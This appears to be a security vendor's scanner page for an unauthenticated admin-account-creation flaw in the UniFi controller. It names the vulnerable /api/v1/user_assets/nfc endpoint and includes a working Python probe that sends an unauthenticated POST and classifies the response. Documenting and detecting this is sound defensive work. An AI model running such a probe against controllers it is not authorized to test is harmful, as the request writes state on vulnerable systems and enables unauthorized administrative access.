S4E

UniFi Unauthenticated Admin Account Creation Scanner

Detects 'Unauthenticated Admin Account Creation' vulnerability in UniFi.

Short Info

Level: High
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 23 days 6 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox

UniFi is Ubiquiti's platform for centrally managing Wi-Fi and wired network devices. It is common in small and medium-sized businesses and home offices, where a single controller handles the provisioning and configuration of access points, switches and gateways. Its interface is usable without deep networking knowledge, which is part of why it is so widely deployed; that same reach makes the controller a high-value management-plane target, because whoever administers it controls every device behind it.

The vulnerability detected, Unauthenticated Admin Account Creation, occurs when a system lets a client create an administrator account without first proving its identity. Every later authorization decision on the controller rests on who holds an admin account, so an attacker who can mint one gains full administrative control, including read and write access to the configuration and to any data the system handles. Authentication must be enforced on the endpoint itself rather than assumed from the caller's network position; a privileged write path that skips this check is a direct loss of system integrity and confidentiality.

In this case the issue lies in the /api/v1/user_assets/nfc endpoint on the UniFi platform. The endpoint accepts POST requests without requiring authentication or session validation; the request body can carry fields such as alias, asset_id, nfc_id and tokens. When such a request is processed, the backend returns a success status code over HTTP, which shows that the request was handled without any check of the requester's identity. An API endpoint that writes state on behalf of an anonymous caller is precisely the gap this scanner looks for, and it is what lets an unauthenticated party reach administrative functionality.
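As an added example (not S4E's scanner and not UniFi code), the following Python sends exactly such a POST with no session cookie and no Authorization header and classifies the reply. The field names follow this page; the placeholder values, the assumed hostname, the verdict labels and the handling of HTML responses are assumptions made for this example. Run it only against a controller you are authorized to test, since a vulnerable backend will actually process the request.

```python
"""
Added example: unauthenticated probe of /api/v1/user_assets/nfc and a
classifier for the response. Not S4E's scanner, not UniFi code.
"""
import json
import ssl
import sys
import urllib.error
import urllib.request

ENDPOINT = "/api/v1/user_assets/nfc"  # endpoint named on the page

# Assumed probe body: the field names come from the page, the values are
# placeholders chosen for this example.
PROBE_BODY = {
    "alias": "s4e-check",
    "asset_id": "00000000-0000-0000-0000-000000000000",
    "nfc_id": "00000000",
    "tokens": [],
}


def build_request(base_url: str) -> urllib.request.Request:
    """Build the POST with no Cookie or Authorization header.

    The check is whether the backend accepts a request that carries no
    session at all, so the request deliberately sends none.
    """
    data = json.dumps(PROBE_BODY).encode("utf-8")
    return urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=data,
        method="POST",
        headers={"Content-Type": "application/json",
                 "Accept": "application/json"},
    )


def classify(status: int, body: str) -> str:
    """Turn the unauthenticated response into a verdict.

    401/403: a session check is in place.
    2xx with a non-HTML body: the backend processed the request without
      any identity check, which is the condition reported by the scanner.
    2xx with an HTML body: inconclusive. Controllers often answer unknown
      or login-gated paths with the web UI (or a redirect to it that urllib
      follows), and that must not be counted as a finding.
    Anything else (404, 5xx, ...): inconclusive rather than "safe".
    """
    if status in (401, 403):
        return "auth-enforced"
    if 200 <= status < 300:
        if body.lstrip().startswith("<"):
            return "inconclusive"
        return "vulnerable"
    return "inconclusive"


def probe(base_url: str, timeout: float = 10.0,
          verify_tls: bool = True) -> str:
    """Send the probe and classify whatever comes back (network access)."""
    ctx = ssl.create_default_context()
    if not verify_tls:  # self-signed certificates are common on controllers
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = build_request(base_url)
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify(resp.status,
                            resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        # 4xx/5xx arrive here; the status and body are still classifiable
        return classify(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Assumed invocation: python probe.py https://unifi.example.test:8443
    target = sys.argv[1] if len(sys.argv) > 1 else "https://unifi.example.test:8443"
    print(probe(target, verify_tls=False))
```

The HTML rule is the caveat that matters in practice: a bare "200 means vulnerable" check produces false positives on controllers that serve the single-page UI for any path, so the body has to be inspected. A 401 or 403 is the result a patched controller should give for this request.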

If exploited, the vulnerability lets an attacker create admin accounts they should never hold. With administrative access they can change the network configuration, read sensitive data and weaken the system further, for example by adding more backdoor accounts or turning off logging. The consequences include data breaches and financial loss, and a compromised controller can serve as a foothold for further attacks or be used to push malicious configuration to the devices it manages. Mitigating the issue protects both the controller and every device and user behind it.
